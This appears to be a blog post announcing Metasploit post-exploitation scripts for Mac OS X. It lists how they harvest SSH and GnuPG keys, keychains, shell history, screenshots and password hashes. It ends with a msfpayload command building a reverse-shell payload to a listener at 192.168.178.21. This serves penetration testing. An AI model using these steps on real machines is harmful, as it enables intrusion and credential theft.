As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Mac OS X target.
These Metasploit post exploitation scripts are supporting version 10.3, 10.4, 10.5, 10.6 and 10.7 of Mac OS X. For the moment are only working with a “shell” payload but Carlos is working on a version how is supporting a complete integration with meterpreter. Also Carlos is working on an iOS integration.
Mac OS X enum_osx post exploitation script
This script will permit you to gather available data types by automating the execution of the “/usr/sbin/system_profiler” command. Depending on your Mac OS X version, you will have more or less available data types. Here under some examples :
- SPSoftwareDataType : Everything related to system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and if secure virtual memory is enabled).
- SPNetworkDataType : Every thing related to the networks configurations (IPs, networks, gateways, configuration methods, proxies, Mac addresses, etc.).
- SPBluetoothDataType : All informations related to the Bluetooth configuration (shared folders, authentication requirements, etc).
- SPEthernetDataType : All informations related to ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, Kext name, location and version).
- SPAirPortDataType : All informations related to the Airport configuration (model, firmware version, current wireless network and channel).
- SPNetworkLocationDataType : More detailed information’s on the networks configurations.
- SPUSBDataType : All informations on the USB bus and connected devices.
- SPPrintersDataType : All informations on local or remote configured printers.
- SPFirewallDataType : All informations related to the local Firewall (Firewall mode, authorized applications, logging mode and stealth mode).
- SPApplicationsDataType : All informations on all installed software’s (version, last modification date, location, etc.).
- SPDeveloperToolsDataType : All informations on the installed development tools.
- SPFrameworksDataType : All informations on the Apple Frameworks (version, last modification date, location, etc.).
- SPStartupItemDataType : All informations on the start-up items (description, location, requirements, start-up order preferences).
- SPPrefPaneDataType : All informations related to the preference panes (version, visible or not, identifier and location).
- SPLogsDataType : All non rotated log files and they’re recent contents.
Also some others commands are executed to gather more information’s :
- Current TCP connections (netstat -np tcp).
- Current UDP connections (netstat -np udp).
- Environment variables (printenv).
- Last boot time (who -b).
- Current activity (who).
- Process list (ps -ea).
- List of all users (dscacheutil -q user).
- List of all groups (dscacheutil -q group).
- Download the “$HOME/.ssh/” folder contain.
- Download the “$HOME/.gnupg/” folder contain.
- Download the “$HOME/*_history” file.
- Download users configured Keychains by “/usr/bin/security list-keychains” command.
- Extract and download history files.
- Take a screenshot of the current session in JPEG format.
Same as for the hasdump script, if the Metasploit session is running with the Mac OS X root privileges, the SHA, LM and/or NTLM users accounts passwords hash dumps will be download.
All gathered informations are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.
Mac OS X hashdump post exploitation script
As described above this script will focus only to gather the Mac OS X users accounts SHA, LM and/or NTLM passwords hash dumps, and download everything on the Metasploit station. All gathered information’s are saved into a “logs/post/enum_osx/hostname-date” folder located into your “$HOME/.msf3” folder.
To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.
First create the payload with msfpayload and upload it to the targeted Mac OS X.
sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test
Then in msfconsole, run the following commands.
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
After on the targeted Mac OS X, execute the test payload
Or you could play with a valid Mac OS X system or application exploit. Here under a PoC video.